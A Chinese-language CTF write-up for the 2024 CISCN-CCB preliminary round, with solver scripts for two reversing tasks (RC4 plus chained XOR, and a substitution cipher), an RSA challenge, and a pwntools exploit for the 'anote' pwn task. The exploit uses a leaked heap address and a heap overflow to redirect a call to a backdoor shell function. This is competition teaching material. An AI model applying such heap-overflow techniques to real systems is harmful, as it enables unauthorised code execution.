2024ciscn-ccb初赛部分wp

Re

ezCsky

找到rc4和key

def rc4(data, key):
    """Run RC4 over *data* with *key* and return the output as a list of ints.

    Textbook RC4: a key-scheduling pass permutes a 256-entry state, then one
    keystream byte is generated per input byte and XORed in.  Because the
    transform is a plain XOR with the keystream, the same call both encrypts
    and decrypts.
    """
    state = list(range(256))
    key_len = len(key)

    # Key-scheduling algorithm (KSA): scramble the identity permutation.
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % key_len]) % 256
        state[i], state[j] = state[j], state[i]

    # Pseudo-random generation algorithm (PRGA), yielded lazily so that
    # exactly len(data) keystream bytes are produced.
    def keystream():
        i = j = 0
        while True:
            i = (i + 1) % 256
            j = (j + state[i]) % 256
            state[i], state[j] = state[j], state[i]
            yield state[(state[i] + state[j]) % 256]

    return [byte ^ k for byte, k in zip(data, keystream())]


# 42-byte ciphertext from the challenge, written as hex rows of ten bytes.
data = bytes.fromhex(
    "968fb8085da76844f264"
    "9264427a78e6eac278b8"
    "639e5b3dd9283fc87306"
    "ee6b8d0c4ba323aeca40"
    "edd1"
)
key = b'testkey'
# rc4() returns a list of ints, which is what gets printed below.
decrypted = rc4(data, key)
print(decrypted)

RC4 解密得到的数据最后一位是 125(即 '}'),第一位与 'f' 异或得到 'l',猜测是相邻字节异或,而且程序前面也有 xor 模块

# Output of the RC4 stage: every byte is (previous plaintext char) XOR (this
# plaintext char), with the first plaintext char known to be 'f'.
a = [10, 13, 6, 28, 31, 84, 86, 83, 87, 81, 0, 3, 29, 20, 88, 86, 3, 25, 28, 0, 84, 3, 75, 20, 88, 7, 2, 73, 76, 2, 7, 1, 81, 12, 8, 0, 1, 0, 3, 0, 79, 125]
flag = 'f'
prev = ord('f')
# Undo the chained XOR: the last entry is skipped, exactly as the original loop did.
for delta in a[:-1]:
    prev ^= delta
    flag += chr(prev)
print(flag)
# expected: flag{d0f5b330-9a74-11ef-9afd-acde48001122}

dump

程序会解析输入参数

输入flag发现刚好对的上

经过测试猜测是单表代换,且00表示4

把大部分可见字符的映射都找出来

# Single-table substitution recovered by probing the binary: code a[i] maps to
# the printable character s[i] (58 entries each).
a = [0x2e, 0x34, 0x22, 0x2f, 0x31, 0x36, 0x32, 0x26, 0x2c, 0x2d,
     0x1e, 0x30, 0x21, 0x23, 0x24, 0x25, 0x27, 0x28, 0x29, 0x37,
     0x35, 0x20, 0x33, 0x1f, 0x2b, 0x2a, 0x12, 0x18, 0x06, 0x13,
     0x15, 0x1a, 0x16, 0x0a, 0x10, 0x11, 0x02, 0x14, 0x05, 0x07,
     0x08, 0x09, 0x0b, 0x0c, 0x0d, 0x1b, 0x19, 0x04, 0x17, 0x03,
     0x0f, 0x0e, 0x1c, 0x1d, 0x00, 0x38, 0x39, 0x01]
s = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM124{}='
# Sanity check that the two tables line up (both print 58).
print(len(s))
print(len(a))
# Encoded bytes to translate back through the table.
a1 = [0x23, 0x29, 0x1E, 0x24, 0x38, 0x0E, 0x15, 0x20, 0x37, 0x0E, 0x05,
      0x20, 0x00, 0x0E, 0x37, 0x12, 0x1D, 0x0F, 0x24, 0x01, 0x01, 0x39]
# Every code in a is distinct, so a dict gives the same answer as a.index().
decode = dict(zip(a, s))
print("".join(decode[code] for code in a1), end="")

#flag{MTczMDc4MzQ2Ng==}

Pwn

anote

https://ya1orin.github.io/posts/cbe4da55.html

查看保护

无法反编译菜单

发现后门函数

gift泄露堆地址

有堆溢出

函数调用需要经过两次地址读,两次取地址后直接getshell

from pwn import *
context(log_level='debug',arch='i386',os='linux')
filename='./note'

# 1 = run the binary locally, 0 = talk to the remote instance.
debug = 1
if debug:
    io = process(filename)
else:
    io = remote('39.107.73.132',34877)

# Thin one-line wrappers over the pwntools tube API.
def s(a) : io.send(a)
def sa(a, b) : io.sendafter(a, b)
def sl(a) : io.sendline(a)
def sla(a, b) : io.sendlineafter(a, b)
def r() : return io.recv()
def pr() : print(io.recv())
def ru(a) : return io.recvuntil(a)
def inter() : io.interactive()
# NOTE: this def rebinds `debug` (the int flag above) to a function; the
# `if debug:` branch has already executed by now, so nothing breaks.
def debug():
    gdb.attach(io)
def b(addr):
    # Attach gdb with a breakpoint at an absolute address.
    #bk="b *$rebase("+str(addr)+")"
    bk='b *' + str(addr)
    attach(io,bk)
def get_addr():
    # Read a 4-byte little-endian value from the tube (32-bit target).
    #return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    return u32(io.recv()[0:4])


# Menu helpers: each waits for the 'Choice>>' prompt and drives one option.
def add():
    ru(b'Choice>>')
    sl(b'1')
def show(index):
    ru(b'Choice>>')
    sl(b'2')
    ru(b'index: ')
    sl(index)
# edit() lets the caller choose the length as well as the content; the
# writeup notes a heap overflow, presumably because this length is not
# checked against the note's size — TODO confirm in the binary.
def edit(index,size,payload):
    ru(b'Choice>>')
    sl(b'3')
    ru(b'index: ')
    sl(index)
    ru(b'len: ')
    sl(size)
    ru(b'content: ')
    sl(payload)

# Hard-coded address taken from the binary; the writeup above mentions a
# backdoor function, presumably this one.
system = 0x80489ce

add()
add()
add()
add()
add()

# Option 2 on index 4 prints a 'gift: ' line (the writeup calls it a heap
# address leak); parse the hex text into an int.
ru(b'Choice>>')
sl(b'2')
ru(b'index: ')
sl(b'4')
ru(b'gift: ')
gift=io.recvline()
gift = gift.strip()
# NOTE: shadows the builtin `str` for the rest of the script.
str = gift.decode('utf-8')
gift_int = int(str,16)
gift_int = gift_int+8

# 24 bytes of padding followed by the adjusted leaked address, written with
# a length larger than the padding.
payload=b'a'*24+p32(gift_int)
edit(b'1',b'28',payload)
edit(b'4',b'4',p32(system))
edit(b'2',b'1',b'a')

inter()

Crypto

rasnd-2

from Crypto.Util.number import getPrime, bytes_to_long
from random import randint
import os

# The flag comes from the environment and is split into two pieces, one per
# RSA instance below (15 bytes, then the remainder).
FLAG = os.getenv("FLAG").encode()
flag1, flag2 = FLAG[:15], FLAG[15:]

def crypto1():
    """First instance: 2048-bit RSA on flag1 plus two linear hints in p and q.

    Prints n, c, hint1, hint2 one per line.  The multipliers on p (x1, x2)
    are only 11-bit, which is what makes the hints recoverable.
    """
    p, q = getPrime(1024), getPrime(1024)
    n = p * q
    e = 0x10001
    # Drawn in this exact order so the random stream matches the original.
    x1 = randint(0, 2**11)
    y1 = randint(0, 2**114)
    x2 = randint(0, 2**11)
    y2 = randint(0, 2**514)
    hint1 = x1*p + y1*q - 0x114
    hint2 = x2*p + y2*q - 0x514
    c = pow(bytes_to_long(flag1), e, n)
    for value in (n, c, hint1, hint2):
        print(value)


def crypto2():
    """Second instance: 2048-bit RSA on flag2 with a hint that inverts a linear form.

    Prints n, c, hint one per line.  Since n - p - q == (p-1)*(q-1) - 1, the
    hint equals (514*p - 114*q)^(-1) mod n whenever that value is coprime to n.
    """
    p = getPrime(1024)
    q = getPrime(1024)
    n = p * q
    e = 0x10001
    linear = 514*p - 114*q
    hint = pow(linear, n - p - q, n)
    c = pow(bytes_to_long(flag2), e, n)
    for value in (n, c, hint):
        print(value)
# Separator printed around each instance's output.
banner = "=================================================================="
print(banner)
crypto1()
print(banner)
crypto2()
print(banner)
==================================================================
26714373031565422475884702170543410883373766932797969939280017108800123630280453788616378655019907797321111510231223356874948261879543789404350524004468888206101183893553783912724380985843610867526595833197366734130545820436239872839652589346601722085131378640769423529086811124172931366238980772713375464558442159355269775101329989966189515569376297816482517053422913115432001741932739141823138624540815101536913889794642390866813927702475029110686952078530692644252976502169483149132207976114466199894323910052111367201536776408811236973236608134901114724266365223503175620708205259026706410636563563598898057786909
18858506514752992181380154921747008058551432073649358179756400934499734929302097177385112589545638411907187544107364140903835767319765333083263371380171393252284034199968302788035813879025587162178319401359969618990483649417087485156561735201401525887885578022049717026480327032286788738889262482959544912750982820940453807386818377755465477978307315597575247620998533718055915017425523414691659570184139579810707813137941428133321379443751166951391551543594842911886444134180462626200534122766826612914831934523911294746691771890773567919420040686512711305345502628357059345018604242583923374930982823519300498861640
1703011784973694423523066984917892124619751172220144100044171439741165827972687390194124492251819042874252053150043202421782626869660480593115676811212128468596849367155081033328244384876406655473674390204200669968111480368833514298396052119966333625037144526212890106844115852680816838761270006004920982100788509334477038784632813857002635218
8596233896763717102169465608296028563515760739865995489935176725834214423578223747479973270599042824129419113680720794797661942367252581426481246316950815033131044242281997122567448742644673474903897866662886581037133335517704055756596838356619756825253469733432939827965726694808136837419859121356935545730046078254006901859741103020585105901848211173408398897737180145151960784779409091748948609728701125179059580873942337600282247998167059927473965882018545884
==================================================================
16589591418165998974581826396786398930964677585495811776727961980933761422829735502353148344295573923286904134270437840953903058835839647755304524379802201214055337473450626274233655129393993402170849111556891293771331425620727538676892779730518697214030981259596934139791367918170334793203308313793877432632961965570796244678476654144496744143529230273615880581380427053580163718759461912665013484259971242478070197232015833303583839630233529678406449192276948304869831793199422773169924034486860859583248462580782763862788640533350445627327551313451358489108372802941755051199397457477170827875256791335279931822163
3493216727040563603182782528379980992856985367672705061437847758429330967495522030591464555965123991215415707741373551781505882160952702665400598213557438002105417986620056775684429778017927694129314364830399810114133029099512289718032317103775152997628020077046730276692573860628045483306212242357668089602247503892447592293405654694663877541319208584675706845250157767477676729786680662467437147092154919231870894123001829518759712475631380741564021398432758657752054575552932354155897193050199905632726139361666588240188296480829032211689007858038874564883755261054886137380859036520919514155990974745414052260391
738711933947319822947673544397020570805588025177977860210346384599836444962386731037122249298437342058548865629696263398136643393798229605137124995991851470790761577269526848178263795501303172468316859219648198031139444340434290922490343059376784633680231755992893833495307272749496959826984455403224845257667388721423164198610039775635522398580665978800318363980423481678985219561212776853383645384028341490465579340909534811109967923304778965393247025954945989704145828423228694680674422850911134777381837444273593086003338565398835125386790498932704847535695287327571603796733691600956198673926829061013653722889
==================================================================

crypto2 中指数为 n-p-q = φ(n)-1,由欧拉定理可知 (514 * p - 114 * q) 与 hint 在模 n 下互逆,因此对 hint 求逆元即可得到 514 * p - 114 * q,再与 n = p*q 联立即可解出 p、q

from itertools import product
from math import gcd, isqrt

from Crypto.Util.number import *
from gmpy2 import invert
from sympy import symbols,solve

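# --- crypto1: hint_i = x_i*p + y_i*q - const, with x_i < 2**11 ------------
n=26714373031565422475884702170543410883373766932797969939280017108800123630280453788616378655019907797321111510231223356874948261879543789404350524004468888206101183893553783912724380985843610867526595833197366734130545820436239872839652589346601722085131378640769423529086811124172931366238980772713375464558442159355269775101329989966189515569376297816482517053422913115432001741932739141823138624540815101536913889794642390866813927702475029110686952078530692644252976502169483149132207976114466199894323910052111367201536776408811236973236608134901114724266365223503175620708205259026706410636563563598898057786909
c=18858506514752992181380154921747008058551432073649358179756400934499734929302097177385112589545638411907187544107364140903835767319765333083263371380171393252284034199968302788035813879025587162178319401359969618990483649417087485156561735201401525887885578022049717026480327032286788738889262482959544912750982820940453807386818377755465477978307315597575247620998533718055915017425523414691659570184139579810707813137941428133321379443751166951391551543594842911886444134180462626200534122766826612914831934523911294746691771890773567919420040686512711305345502628357059345018604242583923374930982823519300498861640
hint1=1703011784973694423523066984917892124619751172220144100044171439741165827972687390194124492251819042874252053150043202421782626869660480593115676811212128468596849367155081033328244384876406655473674390204200669968111480368833514298396052119966333625037144526212890106844115852680816838761270006004920982100788509334477038784632813857002635218
hint2=8596233896763717102169465608296028563515760739865995489935176725834214423578223747479973270599042824129419113680720794797661942367252581426481246316950815033131044242281997122567448742644673474903897866662886581037133335517704055756596838356619756825253469733432939827965726694808136837419859121356935545730046078254006901859741103020585105901848211173408398897737180145151960784779409091748948609728701125179059580873942337600282247998167059927473965882018545884

# Undo the constant offsets once, outside the loop.
h1 = hint1 + 0x114   # = x1*p + y1*q
h2 = hint2 + 0x514   # = x2*p + y2*q
# a*h1 - b*h2 = (a*x1 - b*x2)*p + (a*y1 - b*y2)*q, so at (a, b) = (x2, x1)
# the p term vanishes and gcd(., n) returns q.  x1, x2 < 2**11, hence the
# bounded search.  The for/else makes an exhausted search fail loudly instead
# of continuing with q == 1 (which would crash later with p == n).
for a, b in product(range(2**12), repeat=2):
    q = gcd(a * h1 - b * h2, n)
    if 1 < q < n:
        break
else:
    raise ValueError("no (a, b) pair split n; the hint offsets or bounds differ from the challenge")

p = n // q
e = 0x10001
d = invert(e, (p-1)*(q-1))
m = pow(c, d, n)

flag1 = long_to_bytes(m)
print(flag1)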

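# --- crypto2: hint = (514*p - 114*q)^(n-p-q) mod n ---------------------------
n2=16589591418165998974581826396786398930964677585495811776727961980933761422829735502353148344295573923286904134270437840953903058835839647755304524379802201214055337473450626274233655129393993402170849111556891293771331425620727538676892779730518697214030981259596934139791367918170334793203308313793877432632961965570796244678476654144496744143529230273615880581380427053580163718759461912665013484259971242478070197232015833303583839630233529678406449192276948304869831793199422773169924034486860859583248462580782763862788640533350445627327551313451358489108372802941755051199397457477170827875256791335279931822163
c2=3493216727040563603182782528379980992856985367672705061437847758429330967495522030591464555965123991215415707741373551781505882160952702665400598213557438002105417986620056775684429778017927694129314364830399810114133029099512289718032317103775152997628020077046730276692573860628045483306212242357668089602247503892447592293405654694663877541319208584675706845250157767477676729786680662467437147092154919231870894123001829518759712475631380741564021398432758657752054575552932354155897193050199905632726139361666588240188296480829032211689007858038874564883755261054886137380859036520919514155990974745414052260391
hint=738711933947319822947673544397020570805588025177977860210346384599836444962386731037122249298437342058548865629696263398136643393798229605137124995991851470790761577269526848178263795501303172468316859219648198031139444340434290922490343059376784633680231755992893833495307272749496959826984455403224845257667388721423164198610039775635522398580665978800318363980423481678985219561212776853383645384028341490465579340909534811109967923304778965393247025954945989704145828423228694680674422850911134777381837444273593086003338565398835125386790498932704847535695287327571603796733691600956198673926829061013653722889
e = 65537

# n - p - q == phi(n) - 1, so hint is the inverse of t = 514*p - 114*q mod n.
# For two 1024-bit primes t is positive and far smaller than n, so inverting
# the hint gives t itself, not just a residue.
x = inverse(hint, n2)

# With q = n2 / p, t = 514*p - 114*q becomes 514*p**2 - x*p - 114*n2 == 0;
# take the positive root of that quadratic.  (The original used a z3 Solver
# here but never imported z3; the closed form needs only the stdlib.)
disc = x * x + 4 * 514 * 114 * n2
root = isqrt(disc)
if root * root != disc:
    raise ValueError("discriminant is not a perfect square; hint is not the expected inverse")
p_val, rem = divmod(x + root, 2 * 514)
if rem or n2 % p_val:
    raise ValueError("quadratic root does not divide n2; hint is not the expected inverse")
q_val = n2 // p_val

d = inverse(e, (p_val - 1) * (q_val - 1))
m = pow(c2, d, n2)
print(long_to_bytes(m))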
#b'flag{bb38781f-f3f4-46c0-956b-e34809406e0c}'

2024ciscn-ccb初赛部分wp
https://j1ya-22.github.io/2025/02/26/2024ciscn-ccb初赛部分wp/